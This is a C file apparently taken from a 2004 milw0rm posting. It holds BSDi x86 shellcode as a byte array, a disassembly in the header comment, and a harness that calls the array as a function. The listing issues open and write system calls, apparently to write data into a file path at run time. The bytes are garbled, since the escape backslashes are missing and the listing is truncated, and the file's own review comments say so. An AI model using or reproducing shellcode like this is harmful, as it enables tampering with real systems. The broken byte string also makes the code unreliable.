/*
BSDi shellcode (x86, AT&T syntax); disassembly of the bytes in code[] below:
jmp 0x57
pop %esi
xor %ebx,%ebx
add $0x8,%ebx
add $0x2,%ebx
mov %bl,0x26(%esi)
xor %ebx,%ebx
add $0x23,%ebx
add $0x23,%ebx
mov %bl,0xffffffa8(%esi)
xor %ebx,%ebx
add $0x26,%ebx
add $0x30,%ebx
mov %bl,0xffffffc2(%esi)
xor %eax,%eax
mov %al,0xb(%esi)
mov %esi,%ebx
add $0x5,%eax
xor %ecx,%ecx
add $0x1,%ecx
xor %edx,%edx
int $0x80
mov %eax,%ebx
xor %eax,%eax
add $0x4,%eax
xor %edx,%edx
mov %dl,0x27(%esi)
mov %esi,%ecx
add $0xc,%ecx
add $0x1b,%edx
int $0x80
xor %eax,%eax
add $0x6,%eax
int $0x80
xor %eax,%eax
add $0x1,%eax
int $0x80
.string "BIN/SH"
*/
/*
 * Payload bytes for the disassembly in the header comment.
 *
 * NOTE(review): the backslashes of the hex escapes appear to have been lost
 * when this page was extracted. As written, the compiler stores the ASCII
 * characters 'x', 'e', 'b', ... rather than the opcode bytes, so each "xNN"
 * pair should be read as one byte of the listing above.
 *
 * What the listing shows, in order:
 *   - jmp / pop %esi: %esi receives an address taken from the stack,
 *     presumably one pushed by a call at the jump target. No such call
 *     appears in the listing -- TODO confirm against the original posting.
 *   - Three byte values (0x0a, 0x46, 0x56) are each built from two adds and
 *     stored at %esi+0x26, %esi-0x58 and %esi-0x3e, so none of them appears
 *     literally in the byte string.
 *   - A zero byte is stored at %esi+0xb, then int $0x80 is issued with
 *     eax=5, ebx=%esi, ecx=1, edx=0.
 *   - The value returned in %eax becomes ebx for a second int $0x80 with
 *     eax=4, ecx=%esi+0xc, edx=0x1b, after a zero byte is stored at
 *     %esi+0x27.
 *   - Two more int $0x80 calls follow with eax=6 and eax=1.
 *   Presumably 5/4/6/1 are open/write/close/exit, i.e. the payload opens a
 *   path at %esi for writing and writes 0x1b bytes from %esi+0xc -- verify
 *   against the BSDi syscall table.
 *
 * The array ends in the six characters "BIN/SH", yet the code addresses
 * offsets up to 0x27 from %esi; the path and data it would write are not in
 * the bytes shown, so the page looks truncated.
 */
char code[] =
"xebx57x5ex31xdbx83xc3x08x83xc3x02x88x5e"
"x26x31xdbx83xc3x23x83xc3x23x88x5exa8x31"
"xdbx83xc3x26x83xc3x30x88x5exc2x31xc0x88"
"x46x0bx89xf3x83xc0x05x31xc9x83xc1x01x31"
"xd2xcdx80x89xc3x31xc0x83xc0x04x31xd2x88"
"x56x27x89xf1x83xc1x0cx83xc2x1bxcdx80x31"
"xc0x83xc0x06xcdx80x31xc0x83xc0x01xcdx80"
"BIN/SH";
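/*
 * Test harness for the byte string in code[].
 *
 * Prints the length of code[] as measured by strlen() (counting stops at the
 * first NUL byte), then casts the array to a function pointer and calls it.
 * Calling into a data array only works where data pages are executable; with
 * NX / W^X enforcement the indirect call faults instead of running the bytes.
 *
 * NOTE(review): the file includes no headers, so printf and strlen are used
 * through implicit declarations.
 *
 * Returns 0 if control ever comes back from the call.
 */
int main(void)
{
    int (*f)();

    f = (int (*)()) code;

    /* strlen() yields size_t; cast so the argument matches %lu. The newline
     * escape at the end of the format string had lost its backslash. */
    printf("BSDi old shellcode, %lu bytes\n", (unsigned long) strlen(code));

    (void)(*f)();
    return 0;
}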
// milw0rm.com [2004-09-26]